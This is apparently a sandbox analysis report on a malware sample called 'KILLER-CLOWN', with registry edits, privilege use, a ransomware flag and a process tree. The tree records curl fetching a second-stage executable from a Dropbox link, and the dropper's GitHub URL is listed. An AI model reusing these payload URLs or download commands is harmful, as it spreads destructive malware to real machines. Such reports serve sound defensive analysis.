Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\blendfile	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\rlogin	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\DefaultIcon\ = "%SystemRoot%\\system32\\url.dll,5"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\ = "open"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\wordxmlfile\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.svg\Content Type = "image/svg+xml"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell\open	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\https\DefaultIcon	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\" \"%2\" \"%3\" \"%4\""	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\DefaultIcon\ = "C:\\java\\icons\\6.ico"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\DefaultIcon\ = "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE,-17"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\DefaultIcon	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\http\URL Protocol	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5732"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithProgIds	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\shellex\IconHandler	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.html\OpenWithProgIds\IE.AssocFile.HTM	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xht\ = "xhtmlfile"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open\ = "Open in S&ame Window"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open	ie4uinit.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\ = "Ярлик Інтернету"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SearchFolder\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\URL Protocol	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\DefaultIcon	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shell\open\command	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\open\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\uTorrent\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\""	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.URL\ = "InternetShortcut"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\CommandId = "IE.File"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\ = "URL:File Transfer Protocol"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\wordhtmltemplate\DefaultIcon\ = "C:\\java\\icons\\2.ico"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\EditFlags = "2"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.html\OpenWithProgIds\IE.AssocFile.HTM	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shellex	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.partial\OpenWithProgIds	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\CommandId = "IE.File"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\ = "&Open"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\DefaultIcon	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\Shell\	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\bittorrent	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xht\OpenWithProgIds\xhtmlfile	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell	ie4uinit.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5768 reg.exe
NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Непідтверджений 177208.crdownload:SmartScreen msedge.exe

pid	process
5768	reg.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Непідтверджений 177208.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exe

pid	process
3876	msedge.exe
3876	msedge.exe
2016	msedge.exe
2016	msedge.exe
3012	identity_helper.exe
3012	identity_helper.exe
5668	msedge.exe
5668	msedge.exe
6084	msedge.exe
6084	msedge.exe
6084	msedge.exe
6084	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

2016 msedge.exe
2016 msedge.exe
2016 msedge.exe
2016 msedge.exe
2016 msedge.exe
2016 msedge.exe
2016 msedge.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

7zFM.exeWMIC.exevssvc.exe7z.exeAUDIODG.EXEtaskkill.exe

description	pid	process
Token: SeRestorePrivilege	4268	7zFM.exe
Token: 35	4268	7zFM.exe
Token: SeIncreaseQuotaPrivilege	6060	WMIC.exe
Token: SeSecurityPrivilege	6060	WMIC.exe
Token: SeTakeOwnershipPrivilege	6060	WMIC.exe
Token: SeLoadDriverPrivilege	6060	WMIC.exe
Token: SeSystemProfilePrivilege	6060	WMIC.exe
Token: SeSystemtimePrivilege	6060	WMIC.exe
Token: SeProfSingleProcessPrivilege	6060	WMIC.exe
Token: SeIncBasePriorityPrivilege	6060	WMIC.exe
Token: SeCreatePagefilePrivilege	6060	WMIC.exe
Token: SeBackupPrivilege	6060	WMIC.exe
Token: SeRestorePrivilege	6060	WMIC.exe
Token: SeShutdownPrivilege	6060	WMIC.exe
Token: SeDebugPrivilege	6060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6060	WMIC.exe
Token: SeRemoteShutdownPrivilege	6060	WMIC.exe
Token: SeUndockPrivilege	6060	WMIC.exe
Token: SeManageVolumePrivilege	6060	WMIC.exe
Token: 33	6060	WMIC.exe
Token: 34	6060	WMIC.exe
Token: 35	6060	WMIC.exe
Token: 36	6060	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6060	WMIC.exe
Token: SeSecurityPrivilege	6060	WMIC.exe
Token: SeTakeOwnershipPrivilege	6060	WMIC.exe
Token: SeLoadDriverPrivilege	6060	WMIC.exe
Token: SeSystemProfilePrivilege	6060	WMIC.exe
Token: SeSystemtimePrivilege	6060	WMIC.exe
Token: SeProfSingleProcessPrivilege	6060	WMIC.exe
Token: SeIncBasePriorityPrivilege	6060	WMIC.exe
Token: SeCreatePagefilePrivilege	6060	WMIC.exe
Token: SeBackupPrivilege	6060	WMIC.exe
Token: SeRestorePrivilege	6060	WMIC.exe
Token: SeShutdownPrivilege	6060	WMIC.exe
Token: SeDebugPrivilege	6060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6060	WMIC.exe
Token: SeRemoteShutdownPrivilege	6060	WMIC.exe
Token: SeUndockPrivilege	6060	WMIC.exe
Token: SeManageVolumePrivilege	6060	WMIC.exe
Token: 33	6060	WMIC.exe
Token: 34	6060	WMIC.exe
Token: 35	6060	WMIC.exe
Token: 36	6060	WMIC.exe
Token: SeBackupPrivilege	5172	vssvc.exe
Token: SeRestorePrivilege	5172	vssvc.exe
Token: SeAuditPrivilege	5172	vssvc.exe
Token: SeRestorePrivilege	740	7z.exe
Token: 35	740	7z.exe
Token: SeSecurityPrivilege	740	7z.exe
Token: SeSecurityPrivilege	740	7z.exe
Token: 33	5328	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5328	AUDIODG.EXE
Token: SeDebugPrivilege	5268	taskkill.exe

Suspicious use of FindShellTrayWindow 41 IoCs

Processes:

msedge.exe7zFM.exehide.exempv.exehide.exehide.exe

pid	process
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
4268	7zFM.exe
5576	hide.exe
5408	mpv.exe
5408	mpv.exe
5440	hide.exe
4768	hide.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe
2016	msedge.exe

Suspicious use of SetWindowsHookEx 58 IoCs

Processes:

3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exe3MB Online Install.exeStart.execurl.exeDriver.execlown.exestartban.exedef.exestartcur.exestartkey.exekey.exeDisDef.exeban.exeban.exe7z.exestartdelstartup.exestartuac.exestartauto.exestartWinlog.exestartExplorerIcons.exestarticons.exedelstartup.exeuac.exeauto.exeExplorerIcons.exeicons.exestarthosts.exestartWPChanger.execlown.exestartvol.exestartScreenBlocker.exestartcur.exeattention.exehosts.exestartWinlog.exestartf.exestartban.exevol.exeban.exef.exeban.exewp.exewp.exempv.exe

pid	process
5772	3MB Online Install.exe
5952	Start.exe
6064	curl.exe
6108	3MB Online Install.exe
2384	Start.exe
236	curl.exe
380	3MB Online Install.exe
4916	Start.exe
3592	curl.exe
5532	3MB Online Install.exe
5588	Start.exe
2680	curl.exe
5680	3MB Online Install.exe
544	Start.exe
1196	curl.exe
5984	Driver.exe
1308	clown.exe
6012	startban.exe
5068	def.exe
5356	startcur.exe
5352	startkey.exe
1908	key.exe
1592	DisDef.exe
4536	ban.exe
3612	ban.exe
740	7z.exe
3612	ban.exe
5884	startdelstartup.exe
844	startuac.exe
5440	startauto.exe
5088	startWinlog.exe
5964	startExplorerIcons.exe
5872	starticons.exe
3180	delstartup.exe
5996	uac.exe
3996	auto.exe
3140	ExplorerIcons.exe
1464	icons.exe
5240	starthosts.exe
284	startWPChanger.exe
296	clown.exe
844	startvol.exe
4116	startScreenBlocker.exe
5732	startcur.exe
5684	attention.exe
5588	hosts.exe
6120	startWinlog.exe
5028	startf.exe
1612	startban.exe
5356	vol.exe
5536	ban.exe
5284	f.exe
888	ban.exe
2728	wp.exe
888	ban.exe
5876	wp.exe
5408	mpv.exe
5408	mpv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2016 wrote to memory of 4796	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4796	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 4228	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 3876	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 3876	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe
PID 2016 wrote to memory of 2396	2016	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/theevilteam/KILLER-CLOWN-extracted/raw/main/3MB%20Online%20Install.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffef40346f8,0x7ffef4034708,0x7ffef4034718
2⤵
PID:4796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
2⤵
PID:4228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
2⤵
PID:2396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
2⤵
PID:3712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
2⤵
PID:4900

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
2⤵
PID:4372

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
2⤵
PID:1196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
2⤵
PID:1572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --service-sandbox-type=collections --mojo-platform-channel-handle=5136 /prefetch:8
2⤵
PID:4564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
2⤵
PID:468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
2⤵
PID:1432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
2⤵
PID:4404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6512 /prefetch:8
2⤵
PID:2404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2024,7921044885941603228,17057618565943244712,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=6732 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5668

C:\Users\Admin\Downloads\3MB Online Install.exe
"C:\Users\Admin\Downloads\3MB Online Install.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5772

C:\ProgramData\Drivers\Start.exe
"C:\ProgramData\Drivers\Start.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5952

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\886A.tmp\886B.tmp\887B.bat C:\ProgramData\Drivers\Start.exe"
4⤵
PID:6012

C:\ProgramData\Drivers\curl.exe
C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6064

C:\Users\Admin\Downloads\3MB Online Install.exe
"C:\Users\Admin\Downloads\3MB Online Install.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6108

C:\ProgramData\Drivers\Start.exe
"C:\ProgramData\Drivers\Start.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2384

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9059.tmp\905A.tmp\905B.bat C:\ProgramData\Drivers\Start.exe"
4⤵
PID:5148

C:\ProgramData\Drivers\curl.exe
C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:236

C:\Users\Admin\Downloads\3MB Online Install.exe
"C:\Users\Admin\Downloads\3MB Online Install.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:380

C:\ProgramData\Drivers\Start.exe
"C:\ProgramData\Drivers\Start.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4916

